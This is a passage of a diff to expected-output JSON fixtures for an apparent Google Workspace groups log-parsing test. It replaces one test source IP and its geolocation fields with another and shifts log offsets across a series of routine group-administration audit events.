         "event.provider": "groups",
         "event.type": [
             "group",
@@ -87,26 +83,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 559,
+        "log.offset": 558,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -127,7 +119,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"approve_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"approve_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "change",
@@ -144,27 +136,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 946,
+        "log.offset": 944,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -190,7 +178,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "change",
@@ -206,26 +194,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 1385,
+        "log.offset": 1382,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -246,7 +230,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"request_to_join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"request_to_join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "group",
@@ -262,26 +246,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 1759,
+        "log.offset": 1755,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -303,7 +283,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_basic_setting\",\"parameters\":[{\"name\":\"basic_setting\",\"value\":\"allow_external_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value\",\"value\":\"true\"},{\"name\":\"old_value\",\"value\":\"false\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_basic_setting\",\"parameters\":[{\"name\":\"basic_setting\",\"value\":\"allow_external_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value\",\"value\":\"true\"},{\"name\":\"old_value\",\"value\":\"false\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "change",
@@ -321,26 +301,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 2144,
+        "log.offset": 2139,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -361,7 +337,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"create_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"create_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "creation",
@@ -376,26 +352,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 2665,
+        "log.offset": 2659,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -416,7 +388,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"delete_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"delete_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "deletion",
@@ -431,26 +403,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 3047,
+        "log.offset": 3040,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -472,7 +440,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_identity_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"identity_setting\",\"value\":\"required_forms_of_identity\"},{\"name\":\"new_value\",\"value\":\"display_name_only\"},{\"name\":\"old_value\",\"value\":\"display_name_or_google_profile\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_identity_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"identity_setting\",\"value\":\"required_forms_of_identity\"},{\"name\":\"new_value\",\"value\":\"display_name_only\"},{\"name\":\"old_value\",\"value\":\"display_name_or_google_profile\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "change",
@@ -490,26 +458,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 3429,
+        "log.offset": 3421,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -531,7 +495,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "creation",
@@ -548,26 +512,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 3998,
+        "log.offset": 3989,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -589,7 +549,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"new_value\",\"value\":\"footer\"},{\"name\":\"old_value\",\"value\":\"old footer\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"new_value\",\"value\":\"footer\"},{\"name\":\"old_value\",\"value\":\"old footer\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "change",
@@ -607,26 +567,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 4466,
+        "log.offset": 4456,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -648,7 +604,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "deletion",
@@ -665,26 +621,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 4983,
+        "log.offset": 4972,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -706,7 +658,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_new_members_restrictions_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_members_restrictions_setting\",\"value\":\"new_members_can_post\"},{\"name\":\"new_value\",\"value\":\"inherit\"},{\"name\":\"old_value\",\"value\":\"overriden_to_false\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_new_members_restrictions_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_members_restrictions_setting\",\"value\":\"new_members_can_post\"},{\"name\":\"new_value\",\"value\":\"inherit\"},{\"name\":\"old_value\",\"value\":\"overriden_to_false\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "change",
@@ -724,26 +676,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 5454,
+        "log.offset": 5442,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -765,7 +713,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_post_replies_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"post_replies_setting\",\"value\":\"where_should_replies_be_sent\"},{\"name\":\"new_value\",\"value\":\"reply_to_custom_address\"},{\"name\":\"old_value\",\"value\":\"reply_to_author_only\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_post_replies_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"post_replies_setting\",\"value\":\"where_should_replies_be_sent\"},{\"name\":\"new_value\",\"value\":\"reply_to_custom_address\"},{\"name\":\"old_value\",\"value\":\"reply_to_author_only\"}]}}",
         "event.provider": "groups",
         "event.type": [
             "change",
@@ -783,26 +731,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 6027,
